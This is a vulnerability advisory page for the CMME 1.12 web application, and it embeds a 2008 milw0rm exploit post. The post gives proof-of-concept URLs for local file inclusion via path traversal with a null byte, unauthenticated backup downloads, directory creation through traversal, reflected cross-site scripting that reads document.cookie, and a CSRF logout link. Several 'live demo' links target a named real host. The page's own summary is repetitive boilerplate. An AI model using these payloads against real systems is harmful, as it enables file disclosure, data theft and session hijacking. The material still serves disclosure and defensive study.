CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities

vendor:

CMME

by:

SirGod

7.5

CVSS

HIGH

Local File Inclusion, Download Backup, Make Directory, Cross Site Scripting, Cross Site Request Forgery

79, 352, 434, 89, 352

CWE

Product Name: CMME

Affected Version From: 1.12

Affected Version To: 1.12

Patch Exists: NO

Related CWE: N/A

CPE: a:cmme:cmme:1.12

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities

CMME 1.12 is vulnerable to Local File Inclusion, Download Backup, Make Directory, Cross Site Scripting and Cross Site Request Forgery. Local File Inclusion can be exploited by sending a maliciously crafted HTTP request with a specially crafted parameter value. Download Backup can be exploited by sending a maliciously crafted HTTP request with a specially crafted parameter value. Make Directory can be exploited by sending a maliciously crafted HTTP request with a specially crafted parameter value. Cross Site Scripting can be exploited by sending a maliciously crafted HTTP request with a specially crafted parameter value. Cross Site Request Forgery can be exploited by sending a maliciously crafted HTTP request with a specially crafted parameter value.

Mitigation:

To mitigate Local File Inclusion, Download Backup, Make Directory, Cross Site Scripting and Cross Site Request Forgery, the user should ensure that all input is validated and sanitized before being used. The user should also ensure that all web applications are up to date with the latest security patches.

Source

Exploit-DB raw data:

##################################################################################################################
[+] CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities 
[+] Discovered By SirGod                        
[+] www.mortal-team.org                        
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##################################################################################################################

[+] Local File Inclusion

    Note : magic_quotes_gpc must be off.
 
    Example :

     http://localhost/index.php?page=weblog&env=[Local File]%00

    PoC :

     http://localhost/index.php?page=weblog&env=../../../autoexec.bat%00
    

[+] Download Backup

     Example 1:

       http://localhost/backup/[Backup Name].zip

     PoC 1:

       http://localhost/backup/cmme_data.zip

     Live Demo 1:

       http://cmme.oesterholt.net/backup/cmme_data.zip

     Example 2:

       http://localhost/backup/[Backup Name].zip

     PoC 2:

       http://localhost/backup/cmme_cmme.zip

     Live Demo 2:

       http://cmme.oesterholt.net/backup/cmme_cmme.zip

      
[+] Make Directory

    You can make multiple directories in website root folder.

      Example 1:
     
        http://localhost/admin.php?action=login&page=home&script=index.php&env=[Directory]

      PoC 1:

        http://localhost/admin.php?action=login&page=home&script=index.php&env=!!!Owned!!!


    Or you can make dir in previous directory,etc.

      Example 2:

        http://localhost/admin.php?action=login&page=home&script=index.php&env=../[Directory]

      PoC 2:

        http://localhost/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!!


[+] Cross Site Scripting  

     Example 1:
     
      http://localhost/statistics.php?action=hstat_year&page=[XSS}&env=data

     PoC 1:

      http://localhost/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data

     Live Demo 1:

      http://cmme.oesterholt.net/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data

     Example 2:

      http://localhost/statistics.php?action=hstat_year&year=[XSS]&env=data

     PoC 2:

      http://localhost/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data

     Live Demo 2:
     
      http://cmme.oesterholt.net/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data


[+] Cross Site Request Forgery

    If an logged in user with administrator privileges clicks the following link he will be logged out.

      http://localhost/admin.php?action=logout&page=home&env=data


##################################################################################################################

# milw0rm.com [2008-08-26]